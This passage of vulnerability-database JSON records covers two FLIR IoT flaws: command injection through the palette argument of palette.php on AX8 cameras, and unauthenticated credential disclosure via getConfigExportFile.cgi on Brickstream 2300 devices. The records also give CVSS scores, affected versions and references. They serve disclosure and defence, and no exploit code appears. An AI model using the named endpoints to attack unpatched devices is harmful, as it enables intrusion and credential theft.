          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202212-0903",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ax8",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "flir",
            "version": "1.46.16"
          },
          {
            "model": "ax8",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "flir",
            "version": "1.46.0"
          },
          {
            "model": "ax8",
            "scope": null,
            "trust": 0.8,
            "vendor": "flir",
            "version": null
          },
          {
            "model": "ax8",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "flir",
            "version": "flir ax8  firmware  1.46.0  that\u0027s all  1.46.16"
          },
          {
            "model": "ax8",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "flir",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-023136"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-4364"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:flir:flir_ax8_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "1.46.16",
                        "versionStartIncluding": "1.46.0",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:flir:flir_ax8:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-4364"
          }
        ]
      },
      "cve": "CVE-2022-4364",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "cna@vuldb.com",
                "availabilityImpact": "LOW",
                "baseScore": 7.3,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 3.9,
                "impactScore": 3.4,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-4364",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2022-4364",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "cna@vuldb.com",
                "id": "CVE-2022-4364",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202212-2736",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-023136"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-4364"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-4364"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2736"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A vulnerability classified as critical has been found in Teledyne FLIR AX8 up to 1.46.16. Affected is an unknown function of the file palette.php of the component Web Service Handler. The manipulation of the argument palette leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-215118 is the identifier assigned to this vulnerability. FLIR Systems, Inc. of flir ax8 The firmware has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-4364"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-023136"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-4364"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-4364",
            "trust": 3.3
          },
          {
            "db": "VULDB",
            "id": "215118",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-023136",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2736",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-4364",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-4364"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-023136"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-4364"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2736"
          }
        ]
      },
      "id": "VAR-202212-0903",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 1.0
      },
      "last_update_date": "2023-12-18T13:22:03.427000Z",
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "OS Command injection (CWE-78) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-023136"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-4364"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://vuldb.com/?id.215118"
          },
          {
            "trust": 2.5,
            "url": "https://github.com/siriuswhiter/vulnhub/blob/main/flir/02-flir-ax8%20palette.php%20%e5%91%bd%e4%bb%a4%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e/flir-ax8%20palette.php%20%e5%91%bd%e4%bb%a4%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e1.md"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-4364"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-4364/"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/77.html"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/74.html"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/707.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-4364"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-023136"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-4364"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2736"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2022-4364"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-023136"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-4364"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2736"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-12-08T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-4364"
          },
          {
            "date": "2023-11-27T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-023136"
          },
          {
            "date": "2022-12-08T15:15:10.080000",
            "db": "NVD",
            "id": "CVE-2022-4364"
          },
          {
            "date": "2022-12-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202212-2736"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-12-08T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-4364"
          },
          {
            "date": "2023-11-27T07:59:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-023136"
          },
          {
            "date": "2023-11-07T03:57:39.460000",
            "db": "NVD",
            "id": "CVE-2022-4364"
          },
          {
            "date": "2023-07-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202212-2736"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2736"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "FLIR\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0flir\u00a0ax8\u00a0 in the firmware \u00a0OS\u00a0 Command injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-023136"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2736"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201801-1340

    Vulnerability from variot - Updated: 2023-12-18 13:18

    getConfigExportFile.cgi on FLIR Brickstream 2300 devices 2.0 4.1.53.166 has Incorrect Access Control, as demonstrated by reading the AVI_USER_ID and AVI_USER_PASSWORD fields via a direct request. FLIR Brickstream 2300 The device contains an information disclosure vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FLIR Brickstream 2300 is a customer flow analysis and statistics equipment of Canada FLIR company. An access control error vulnerability exists in the getConfigExportFile.cgi file in FLIR Brickstream 2300 version 2.0 4.1.53.166. An attacker could exploit this vulnerability to obtain information

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201801-1340",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "brickstream 2300 2d",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "flir",
            "version": "2.0_4.1.53.166"
          },
          {
            "model": "brickstream 2300 3d\\+",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "flir",
            "version": "2.0_4.1.53.166"
          },
          {
            "model": "brickstream 2300 3d",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "flir",
            "version": "2.0_4.1.53.166"
          },
          {
            "model": "brickstream 2300 2d",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "flir",
            "version": "2.0 4.1.53.166"
          },
          {
            "model": "brickstream 2300 3d",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "flir",
            "version": "2.0 4.1.53.166"
          },
          {
            "model": "brickstream 2300 3d+",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "flir",
            "version": "2.0 4.1.53.166"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001266"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-3813"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201801-002"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:flir:brickstream_2300_2d_firmware:2.0_4.1.53.166:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:flir:brickstream_2300_2d:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:flir:brickstream_2300_3d_firmware:2.0_4.1.53.166:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:flir:brickstream_2300_3d:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:flir:brickstream_2300_3d\\+_firmware:2.0_4.1.53.166:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:flir:brickstream_2300_3d\\+:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-3813"
          }
        ]
      },
      "cve": "CVE-2018-3813",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.0,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2018-3813",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-133844",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2018-3813",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2018-3813",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201801-002",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-133844",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-133844"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001266"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-3813"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201801-002"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "getConfigExportFile.cgi on FLIR Brickstream 2300 devices 2.0 4.1.53.166 has Incorrect Access Control, as demonstrated by reading the AVI_USER_ID and AVI_USER_PASSWORD fields via a direct request. FLIR Brickstream 2300 The device contains an information disclosure vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FLIR Brickstream 2300 is a customer flow analysis and statistics equipment of Canada FLIR company. An access control error vulnerability exists in the getConfigExportFile.cgi file in FLIR Brickstream 2300 version 2.0 4.1.53.166. An attacker could exploit this vulnerability to obtain information",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-3813"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001266"
          },
          {
            "db": "VULHUB",
            "id": "VHN-133844"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-3813",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001266",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201801-002",
            "trust": 0.7
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-98151",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-133844",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-133844"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001266"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-3813"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201801-002"
          }
        ]
      },
      "id": "VAR-201801-1340",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-133844"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2023-12-18T13:18:26.800000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.brickstream.com/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001266"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-200",
            "trust": 1.9
          },
          {
            "problemtype": "CWE-79",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-133844"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001266"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-3813"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.6,
            "url": "http://misteralfa-hack.blogspot.cl/2018/01/brickstream-recuento-y-seguimiento-de.html"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-3813"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3813"
          },
          {
            "trust": 0.8,
            "url": "http://misteralfa-hack.blogspot.jp/2018/01/brickstream-recuento-y-seguimiento-de.html"
          },
          {
            "trust": 0.1,
            "url": "https://sku11army.blogspot.com/2020/01/flir-brickstream-recuento-y-seguimiento.html"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-133844"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001266"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-3813"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201801-002"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-133844"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001266"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-3813"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201801-002"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-01-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-133844"
          },
          {
            "date": "2018-02-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-001266"
          },
          {
            "date": "2018-01-01T20:29:00.207000",
            "db": "NVD",
            "id": "CVE-2018-3813"
          },
          {
            "date": "2018-01-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201801-002"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-01-15T00:00:00",
            "db": "VULHUB",
            "id": "VHN-133844"
          },
          {
            "date": "2018-02-05T00:00:00",
            "db": "JVNDB",
